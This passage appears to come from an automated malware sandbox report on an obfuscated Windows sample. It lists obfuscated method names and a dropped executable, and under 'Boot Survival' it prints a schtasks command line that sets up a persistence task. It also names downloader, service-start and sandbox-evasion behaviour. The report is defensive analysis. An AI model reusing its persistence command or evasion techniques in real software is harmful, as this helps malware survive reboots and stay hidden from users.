Source: PEbZthAqV9.exe | Static PE information: section name: .text entropy: 7.959401786554723
Source: myTuDsvNcebev.exe.0.dr | Static PE information: section name: .text entropy: 7.959401786554723
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, bJJVsBZZWgOVwbYkM5H.cs | High entropy of concatenated method names: 'BLbclbeM6e', 'RZyczqj4OV', 'WqxF1SDrrD', 'bBaFZYFLLE', 'GkXFOixNoJ', 'h4yFhNtP23', 'xkcFpjSY5s', 'k69FqNFuUb', 'JyIFU4kytM', 'GW5F22KD8b'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, Se72bX2q1AuSqG7kSF.cs | High entropy of concatenated method names: 'Dispose', 'LWSZo57lT5', 'SuXO0Z7aqI', 'dV6h2eI2rm', 'flBZllMxCZ', 'yrgZzg7JRs', 'ProcessDialogKey', 'xyMO1f1UXR', 'SebOZexk4D', 'Y3DOOpDtLA'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, PIXv6ZS2O2mf260BiF.cs | High entropy of concatenated method names: 'l6n8TUCkCT', 'Hw78ver0du', 'mB58IWYNIx', 'ICi8XVoK2r', 'qot8xqMB8h', 'StP8an8c4r', 'PHt84QYGJf', 'QLx8uyVQKs', 'tI78f7eEls', 'oFm8w1TiIN'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, vtKDw7ZpBufmfHDAOH2.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nQoMEDUNYf', 'qbDMc6dr1I', 'KvxMFoJosn', 'vPnMMf4buf', 'ngMMyRJ9UF', 'ClgMVwMhZC', 'O1DMA9eF61'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs | High entropy of concatenated method names: 'zfFhqLtP1Q', 'obHhUaATMG', 'R6Eh2gYNUn', 'oo1hsQVpJR', 'QNGhYRgsWq', 'ROHhQiiwa3', 'TkKh8YjOMg', 'OdYhjy8kWY', 'nHvhLdGLLM', 'f2GhkOX1Sb'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, tCSnZlDsIa6rFn7GG9.cs | High entropy of concatenated method names: 'ToString', 'A5o36cRDsZ', 'zO130AT7B5', 'nTg3GdRUB3', 'rw23BBIrvi', 'ncJ3n9xJM3', 'bZy3gRyNLh', 'Yko3HPhxnj', 'VWL3iPZxyw', 'llL3SJU8H1'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, f6ScPn9UHN3hdBbliX.cs | High entropy of concatenated method names: 'GnsbkojfWy', 'hNkbW0TCxN', 'ToString', 'aDVbURZ4a4', 'Fiqb2HbLnn', 'maEbsDy78N', 'JA1bY2Xqws', 'KTgbQ66vIk', 'oZdb85MLBh', 'CBAbjaTixM'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, riiSb4fVjgPtn8JMCB.cs | High entropy of concatenated method names: 'z6isXnC5H1', 'gpDsarNQcf', 'wCZsuWBNu6', 'mZmsfd9NEs', 'zU6sr8ICXu', 'Vbas3v9gar', 'M2vsbvqQdN', 'XY0sKsXrc2', 'eJLsE1tSlp', 'NNOscxdF2E'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, ajPx2iepbHWS57lT5U.cs | High entropy of concatenated method names: 'wqKErt2PKI', 'q25Ebv81C8', 'vTUEEHd8Ec', 'gyHEFYHTxw', 'sc6EyiPEa8', 'VYWEAmMTub', 'Dispose', 'SxXKUTAffk', 'TrPK2Obx5e', 'VfAKsytwQA'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, jstQxWtP7DH8HSjhvZ.cs | High entropy of concatenated method names: 'OsZbC2YjZv', 'X84blfwKcl', 'BIxK1kUsvN', 'bO7KZCVPN8', 'Hiub6hNJrE', 'rWgbPhhcO8', 'OrcbN5uHrg', 'ADJbmSV2oI', 'G5mbJdkbU6', 'sECbD1YpFW'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, SXi2orgn1dwbsuM2Lf.cs | High entropy of concatenated method names: 'uprQDY0xU3', 'bwuQ9IYMBm', 'PvDQRJyJYA', 'ToString', 'fx1QtCOmKY', 'pqNQeNC7DG', 'RWrdARt8k5iBXr7LFAl', 'Eu4s1YtEGxAZnlY9Bju'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, BOgBkgOlpToyZQ4PIn.cs | High entropy of concatenated method names: 'zrTIUxCJr', 'vlrXglpIV', 'cQOajabuN', 'CWA4UwE8J', 'fayfKtrh1', 'wHtwnJfcS', 'sRtjDAh1oWLsfIBGn3', 'U9PDPRGb3Q2gaQTFxc', 'IBVKhudrW', 'oPAcQWoBB'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, up75WPBHDKxGK74l5D.csHigh entropy of concatenated method names: 'okhQAYEuT6', 'zE8QTLslEe', 'vb2QI2Vn0t', 'WVtQXZx0oJ', 'QUSQa62pD3', 'BRLQ4Ajmqk', 'T2sQfHVWaW', 'zYCQwsN4pt', 'HP1seAtXh29Kj8vOkMS', 'gYGM6styK8i1hY9I0aV'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, g7jqwbz9DZivOojC0W.csHigh entropy of concatenated method names: 'xABcaXvrpa', 'Rc9cudJPK5', 'qRCcfeYjlL', 'nEScd34bCS', 'Ntsc0Co8jP', 'puEcBT92n8', 'YmvcnGAJaV', 'IEycAp0I9J', 'wxecTFGDWk', 'sIScvnXGaq'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, NgxYVCZ1h6HrgfIyLQJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L6Pc6aE0L4', 'A93cPGZ7ps', 'JqUcNNsq4A', 'VJacmuyG93', 'VeBcJ6vGmR', 'QfJcDHAwaM', 'fC2c9X0BhT'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, b2MbunNjObHG4VlQlF.csHigh entropy of concatenated method names: 'Tak7uvfay3', 'HjF7fMSx9b', 'a5F7dfcqgL', 'hiJ70ohiQb', 'fQk7BVCr31', 'm8g7nVxrxw', 'yml7HpxFC1', 'FQ67iTf5LF', 'Eh275BoJa4', 'pja76UJwQh'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, vjUUPrdHML4I34Jdy4.csHigh entropy of concatenated method names: 'DPNQq3wWid', 'A87Q2K6vat', 'E3FQYYAKoJ', 'KlKQ8BZTvX', 'xokQjSHU1P', 'tJ2YRj0FbB', 'mPMYtJ8jv8', 'CFSYe56n6F', 'GY5YCHjADJ', 'wXsYocT4MK'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, RhKX6GpiYHcU0yc3Gh.csHigh entropy of concatenated method names: 'zHKZ809dpi', 'OWuZjlYHTh', 'CVjZkgPtn8', 'SMCZWBGxD4', 'uH3ZrFTVjU', 'fPrZ3HML4I', 'EsokNCCTsg0wgKAihR', 'Fi61rl0C0CFl5hSF01', 'KTgZZB4bHZ', 'BYgZh5eeYD'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, uf1UXRoDebexk4Dl3D.csHigh entropy of concatenated method names: 'UPIEdXL72I', 'XBkE0PsLKL', 'd78EGgTKNi', 'ibuEBNcsDQ', 'rSSEnieE0g', 'OpgEgL8I44', 'oMiEHHnA9t', 'apMEiUsdTW', 'dICESEYXWr', 'YWoE5Wpt89'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, HxD4QkwiTf8WjMH3FT.csHigh entropy of concatenated method names: 'iQBYxOD5Cy', 'dxWY4lQJuB', 'f48sG5a2ZI', 'sTNsBK5G0g', 'QDFsnVFjFL', 'zTYsg8SeIj', 'DFUsH9rCaB', 'mk8sijFC9a', 'yvDsSClu2B', 'ESQs5gxXaY'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, skA3ZlZOGCdXkJCStvx.csHigh entropy of concatenated method names: 'ToString', 'iqGFujZKQv', 's8ZFfH89xX', 'AVuFwfrIpJ', 'pU1Fd1EAYp', 'E5WF0ppvS5', 'muOFGNTLit', 'Nf7FBHA0gX', 'zgu6DnUp4aRU43veNYV', 'dfmij9UCgTbH45SPZ7v'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, dDtLA9l8vTGFGEd474.csHigh entropy of concatenated method names: 'NhDcslR5kQ', 'jMDcYa04jY', 'l3EcQw2AHs', 'DcZc8GdAtS', 'FYAcElFP9C', 'BZVcjkX1rX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, q09dpiu5WulYHThgxc.csHigh entropy of concatenated method names: 'NO42mIlJVj', 'rkO2JOa1Np', 'Pm22DUrrGZ', 'Ui629xykK3', 'Sw42RJoThd', 'wS42tXJZM3', 'i4H2eMvNn5', 'o0R2CBs3Qv', 'wxt2o3f9AB', 'dIL2l8MKq6'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, bJJVsBZZWgOVwbYkM5H.csHigh entropy of concatenated method names: 'BLbclbeM6e', 'RZyczqj4OV', 'WqxF1SDrrD', 'bBaFZYFLLE', 'GkXFOixNoJ', 'h4yFhNtP23', 'xkcFpjSY5s', 'k69FqNFuUb', 'JyIFU4kytM', 'GW5F22KD8b'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, Se72bX2q1AuSqG7kSF.csHigh entropy of concatenated method names: 'Dispose', 'LWSZo57lT5', 'SuXO0Z7aqI', 'dV6h2eI2rm', 'flBZllMxCZ', 'yrgZzg7JRs', 'ProcessDialogKey', 'xyMO1f1UXR', 'SebOZexk4D', 'Y3DOOpDtLA'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, PIXv6ZS2O2mf260BiF.csHigh entropy of concatenated method names: 'l6n8TUCkCT', 'Hw78ver0du', 'mB58IWYNIx', 'ICi8XVoK2r', 'qot8xqMB8h', 'StP8an8c4r', 'PHt84QYGJf', 'QLx8uyVQKs', 'tI78f7eEls', 'oFm8w1TiIN'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, vtKDw7ZpBufmfHDAOH2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nQoMEDUNYf', 'qbDMc6dr1I', 'KvxMFoJosn', 'vPnMMf4buf', 'ngMMyRJ9UF', 'ClgMVwMhZC', 'O1DMA9eF61'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.csHigh entropy of concatenated method names: 'zfFhqLtP1Q', 'obHhUaATMG', 'R6Eh2gYNUn', 'oo1hsQVpJR', 'QNGhYRgsWq', 'ROHhQiiwa3', 'TkKh8YjOMg', 'OdYhjy8kWY', 'nHvhLdGLLM', 'f2GhkOX1Sb'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, tCSnZlDsIa6rFn7GG9.csHigh entropy of concatenated method names: 'ToString', 'A5o36cRDsZ', 'zO130AT7B5', 'nTg3GdRUB3', 'rw23BBIrvi', 'ncJ3n9xJM3', 'bZy3gRyNLh', 'Yko3HPhxnj', 'VWL3iPZxyw', 'llL3SJU8H1'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, f6ScPn9UHN3hdBbliX.csHigh entropy of concatenated method names: 'GnsbkojfWy', 'hNkbW0TCxN', 'ToString', 'aDVbURZ4a4', 'Fiqb2HbLnn', 'maEbsDy78N', 'JA1bY2Xqws', 'KTgbQ66vIk', 'oZdb85MLBh', 'CBAbjaTixM'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, riiSb4fVjgPtn8JMCB.csHigh entropy of concatenated method names: 'z6isXnC5H1', 'gpDsarNQcf', 'wCZsuWBNu6', 'mZmsfd9NEs', 'zU6sr8ICXu', 'Vbas3v9gar', 'M2vsbvqQdN', 'XY0sKsXrc2', 'eJLsE1tSlp', 'NNOscxdF2E'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, ajPx2iepbHWS57lT5U.csHigh entropy of concatenated method names: 'wqKErt2PKI', 'q25Ebv81C8', 'vTUEEHd8Ec', 'gyHEFYHTxw', 'sc6EyiPEa8', 'VYWEAmMTub', 'Dispose', 'SxXKUTAffk', 'TrPK2Obx5e', 'VfAKsytwQA'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, jstQxWtP7DH8HSjhvZ.csHigh entropy of concatenated method names: 'OsZbC2YjZv', 'X84blfwKcl', 'BIxK1kUsvN', 'bO7KZCVPN8', 'Hiub6hNJrE', 'rWgbPhhcO8', 'OrcbN5uHrg', 'ADJbmSV2oI', 'G5mbJdkbU6', 'sECbD1YpFW'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, SXi2orgn1dwbsuM2Lf.csHigh entropy of concatenated method names: 'uprQDY0xU3', 'bwuQ9IYMBm', 'PvDQRJyJYA', 'ToString', 'fx1QtCOmKY', 'pqNQeNC7DG', 'RWrdARt8k5iBXr7LFAl', 'Eu4s1YtEGxAZnlY9Bju'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, BOgBkgOlpToyZQ4PIn.csHigh entropy of concatenated method names: 'zrTIUxCJr', 'vlrXglpIV', 'cQOajabuN', 'CWA4UwE8J', 'fayfKtrh1', 'wHtwnJfcS', 'sRtjDAh1oWLsfIBGn3', 'U9PDPRGb3Q2gaQTFxc', 'IBVKhudrW', 'oPAcQWoBB'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, up75WPBHDKxGK74l5D.csHigh entropy of concatenated method names: 'okhQAYEuT6', 'zE8QTLslEe', 'vb2QI2Vn0t', 'WVtQXZx0oJ', 'QUSQa62pD3', 'BRLQ4Ajmqk', 'T2sQfHVWaW', 'zYCQwsN4pt', 'HP1seAtXh29Kj8vOkMS', 'gYGM6styK8i1hY9I0aV'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, g7jqwbz9DZivOojC0W.csHigh entropy of concatenated method names: 'xABcaXvrpa', 'Rc9cudJPK5', 'qRCcfeYjlL', 'nEScd34bCS', 'Ntsc0Co8jP', 'puEcBT92n8', 'YmvcnGAJaV', 'IEycAp0I9J', 'wxecTFGDWk', 'sIScvnXGaq'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, NgxYVCZ1h6HrgfIyLQJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L6Pc6aE0L4', 'A93cPGZ7ps', 'JqUcNNsq4A', 'VJacmuyG93', 'VeBcJ6vGmR', 'QfJcDHAwaM', 'fC2c9X0BhT'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, b2MbunNjObHG4VlQlF.csHigh entropy of concatenated method names: 'Tak7uvfay3', 'HjF7fMSx9b', 'a5F7dfcqgL', 'hiJ70ohiQb', 'fQk7BVCr31', 'm8g7nVxrxw', 'yml7HpxFC1', 'FQ67iTf5LF', 'Eh275BoJa4', 'pja76UJwQh'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, vjUUPrdHML4I34Jdy4.csHigh entropy of concatenated method names: 'DPNQq3wWid', 'A87Q2K6vat', 'E3FQYYAKoJ', 'KlKQ8BZTvX', 'xokQjSHU1P', 'tJ2YRj0FbB', 'mPMYtJ8jv8', 'CFSYe56n6F', 'GY5YCHjADJ', 'wXsYocT4MK'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, RhKX6GpiYHcU0yc3Gh.csHigh entropy of concatenated method names: 'zHKZ809dpi', 'OWuZjlYHTh', 'CVjZkgPtn8', 'SMCZWBGxD4', 'uH3ZrFTVjU', 'fPrZ3HML4I', 'EsokNCCTsg0wgKAihR', 'Fi61rl0C0CFl5hSF01', 'KTgZZB4bHZ', 'BYgZh5eeYD'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, uf1UXRoDebexk4Dl3D.csHigh entropy of concatenated method names: 'UPIEdXL72I', 'XBkE0PsLKL', 'd78EGgTKNi', 'ibuEBNcsDQ', 'rSSEnieE0g', 'OpgEgL8I44', 'oMiEHHnA9t', 'apMEiUsdTW', 'dICESEYXWr', 'YWoE5Wpt89'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, HxD4QkwiTf8WjMH3FT.csHigh entropy of concatenated method names: 'iQBYxOD5Cy', 'dxWY4lQJuB', 'f48sG5a2ZI', 'sTNsBK5G0g', 'QDFsnVFjFL', 'zTYsg8SeIj', 'DFUsH9rCaB', 'mk8sijFC9a', 'yvDsSClu2B', 'ESQs5gxXaY'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, skA3ZlZOGCdXkJCStvx.csHigh entropy of concatenated method names: 'ToString', 'iqGFujZKQv', 's8ZFfH89xX', 'AVuFwfrIpJ', 'pU1Fd1EAYp', 'E5WF0ppvS5', 'muOFGNTLit', 'Nf7FBHA0gX', 'zgu6DnUp4aRU43veNYV', 'dfmij9UCgTbH45SPZ7v'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, dDtLA9l8vTGFGEd474.csHigh entropy of concatenated method names: 'NhDcslR5kQ', 'jMDcYa04jY', 'l3EcQw2AHs', 'DcZc8GdAtS', 'FYAcElFP9C', 'BZVcjkX1rX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, q09dpiu5WulYHThgxc.csHigh entropy of concatenated method names: 'NO42mIlJVj', 'rkO2JOa1Np', 'Pm22DUrrGZ', 'Ui629xykK3', 'Sw42RJoThd', 'wS42tXJZM3', 'i4H2eMvNn5', 'o0R2CBs3Qv', 'wxt2o3f9AB', 'dIL2l8MKq6'
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004063C6 ShellExecuteW,URLDownloadToFileW,18_2_004063C6
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00418A00

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041A8DA
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match  File source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: myTuDsvNcebev.exe PID: 8016, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe  Code function: 18_2_0040E18D Sleep,ExitProcess, 18_2_0040E18D
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: C10000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 2D50000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 29F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 7AF0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 8AF0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 8CA0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe  Memory allocated: 9CA0000 memory reserve | memory write watch
